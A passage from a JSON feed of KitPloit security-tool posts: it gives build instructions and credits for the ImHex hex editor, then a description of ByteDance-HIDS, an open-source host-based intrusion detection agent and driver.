\n * libmagic, libgnurx, libtre, libintl, libiconv \n * libcrypto \n * capstone \n * nlohmann json \n * Python3 \n * freetype2 \n * Brew (macOS only) \n \n** Windows and Linux ** \n\n\nFind all-in-one dependency installation scripts for Arch Linux, Fedora, Debian/Ubuntu and/or MSYS2 in [ dist ](<https://github.com/WerWolv/ImHex/blob/master/dist> \"dist\" ) . \n\nAfter all the dependencies are installed, run the following commands to build ImHex: \n \n \n mkdir build \n cd build \n cmake -DCMAKE_BUILD_TYPE=Release .. \n make -j\n\n \n\n\nTo create a standalone zipfile on Windows, get the Python standard [ library ](<https://www.kitploit.com/search/label/Library> \"library\" ) (e.g. from [ https://github.com/python/cpython/tree/master/Lib ](<https://github.com/python/cpython/tree/master/Lib> \"https://github.com/python/cpython/tree/master/Lib\" ) ) and place the files and folders in ` lib/python3.8 ` next to your built executable. Don't forget to also copy the ` libpython3.8.dll ` and ` libwinpthread-1.dll ` from your mingw setup next to the executable. \n\nOn both Windows and Linux: \n\n * Copy the files from ` python_libs ` in the ` lib ` folder next to your built executable. \n * Place your magic databases in the ` magic ` folder next to your built executable \n * Place your patterns in the ` pattern ` folder next to your built executable \n * Place your include pattern files in the ` include ` folder next to your built executable \n \n** macOS ** \n\n\nTo build ImHex on macOS, run the following commands: \n \n \n brew bundle --no-lock --file dist/Brewfile \n mkdir build \n cd build \n CC=$(brew --prefix llvm)/bin/clang CXX=$(brew --prefix llvm)/bin/clang++ PKG_CONFIG_PATH=\"$(brew --prefix openssl)/lib/pkgconfig\":\"$(brew --prefix)/lib/pkgconfig\" cmake -DCMAKE_BUILD_TYPE=Release .. \n make -j\n\n \n** Credits ** \n\n\n * Thanks a lot to ocornut for their amazing [ Dear ImGui ](<https://github.com/ocornut/imgui> \"Dear ImGui\" ) which is used for building the entire interface \n * Thanks to orconut as well for their hex editor view used as base for this project. \n * Thanks to BalazsJako for their incredible [ ImGuiColorTextEdit ](<https://github.com/BalazsJako/ImGuiColorTextEdit> \"ImGuiColorTextEdit\" ) used for the pattern language syntax highlighting \n * Thanks to AirGuanZ for their amazing [ imgui-filebrowser ](<https://github.com/AirGuanZ/imgui-filebrowser> \"imgui-filebrowser\" ) used for loading and saving files \n * Thanks to nlohmann for their [ json ](<https://github.com/nlohmann/json> \"json\" ) library used for project files \n * Thanks to aquynh for [ capstone ](<https://github.com/aquynh/capstone> \"capstone\" ) which is the base of the disassembly window \n \n \n\n\n** [ Download ImHex ](<https://github.com/WerWolv/ImHex> \"Download ImHex\" ) **\n", "edition": 1, "modified": "2021-01-17T20:30:00", "published": "2021-01-17T20:30:00", "id": "KITPLOIT:1589614983163960020", "href": "http://www.kitploit.com/2021/01/imhex-hex-editor-for-reverse-engineers.html", "title": "ImHex - A Hex Editor For Reverse Engineers, Programmers And People That Value Their Eye Sight When Working At 3 AM.", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-16T15:30:07", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-zY6QCj9gbqc/X_u0kkN1JBI/AAAAAAAAU-E/3ge7NXefDLA1PbdSfYw1fKXiPkCvFnbdgCNcBGAsYHQ/s2616/ByteDance-HIDS_1_ByteDance-HIDS.png>)\n\n \n\n\nByteDance-HIDS is a Cloud-Native Host-Based [ Intrusion Detection ](<https://www.kitploit.com/search/label/Intrusion%20Detection> \"Intrusion Detection\" ) solution project to provide next-generation [ Threat Detection ](<https://www.kitploit.com/search/label/Threat%20Detection> \"Threat Detection\" ) and Behavior Audition with modern architecture. \n\nByteDance-HIDS comprises three major components\uff1a \n\n * ** ByteDance-HIDS Agent, co-worked with ByteDance-HIDS Driver ** , is the game-changer for the Data Collection market. It works at both Kernel and User Space of Linux System, providing rich data flow with much better performance. \n * ** ByteDance-HIDS Server ** provides Service-Discovery for the production environment of up to millions of agents. The Server also supports primary data formatting along with rules distribution for the Agent. \n * ** ByteDance-HIDS HUB ** provides high-performance, lightweight, and stateless alert generation with data [ manipulation ](<https://www.kitploit.com/search/label/Manipulation> \"manipulation\" ) to analyze the rich data flow. \n\n \n\n\nNow we are more than happy to announce the open-source of ByteDance-HIDS Agent and ByteDance-HIDS Driver. We decided to strengthen the Defense Community with our game-changing technology. Due to the lack of rule engine and detection functions, ByteDance-HIDS Agent and Driver doesn't provide all HIDS capability on its own. However, it is a tremendous Host-Information-Collect-Agent that could be easily integrated with current HIDS/NIDS/XDR solutions on the market. ByteDance-HIDS Agent and ByteDance-HIDS Driver together advance solutions on the market in four major areas. \n\n * ** Better performance ** Data/Information are collected in kernel space to avoid additional supplement actions such as traversal of '/proc' directory or collecting from other audition processes such as \"auditd\". \n * ** Hard to be bypassed ** A specifically designed kernel driver powers data/Information collection, making it virtually impossible for malicious software, like rootkit, to evade detection or audition. The Driver could capture even evasion behavior itself. \n * ** Kernel + User Space ** ByteDance-HIDS Agent provides User Space detection abilities, including file audition, in-house rule detection, and primary allowlists. \n * ** Easy to be integrated ** ByteDance-HIDS could empower any User Space agents far beyond Host Intrusion usages with the detailed and reliable data flow. A wide user action audition could benefit both Behavior [ Analysis ](<https://www.kitploit.com/search/label/Analysis> \"Analysis\" ) and [ Compliance ](<https://www.kitploit.com/search/label/Compliance> \"Compliance\" ) requests. When integrated with NIDS, security analyzers could build a comprehensive Provenance Graph from the network connections, along with high traceable process trees and file auditions. \n \n** System Architecture ** \n\n\n \n\n\n[  ](<https://1.bp.blogspot.com/-PuYlMezQACA/X_u0svjR4GI/AAAAAAAAU-I/YUrl3OvzCxkaIe_3utOJhSG8rPFkMw__gCNcBGAsYHQ/s2616/ByteDance-HIDS_1_ByteDance-HIDS.png>)\n\n \n\n\nCurrently, we are only open-sourcing ByteDance-HIDS Agent && Driver. Both components have been deployed and tested in production environments for months. We welcome any suggestions and cooperation. \n\n * ** [ ByteDance-HIDS Driver ](<https://github.com/bytedance/ByteDance-HIDS/tree/main/driver> \"ByteDance-HIDS Driver\" ) ** \n\n * ** [ ByteDance-HIDS Agent ](<https://github.com/bytedance/ByteDance-HIDS/tree/main/agent> \"ByteDance-HIDS Agent\" ) ** \n\n \n** To be Continued ** \n\n\n * ByteDance-Server is under development. More Features are on the way. \n \n \n\n\n** [ Download ByteDance-HIDS ](<https://github.com/bytedance/ByteDance-HIDS> \"Download ByteDance-HIDS\" ) **\n", "edition": 1, "modified": "2021-01-16T11:30:06", "published": "2021-01-16T11:30:06", "id": "KITPLOIT:8692887888107645706", "href": "http://www.kitploit.com/2021/01/bytedance-hids-cloud-native-host-based.html", "title": "ByteDance-HIDS - A Cloud-Native Host-Based Intrusion Detection Solution Project To Provide Next-Generation Threat Detection And Behavior Audition With Modern Architecture", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}]}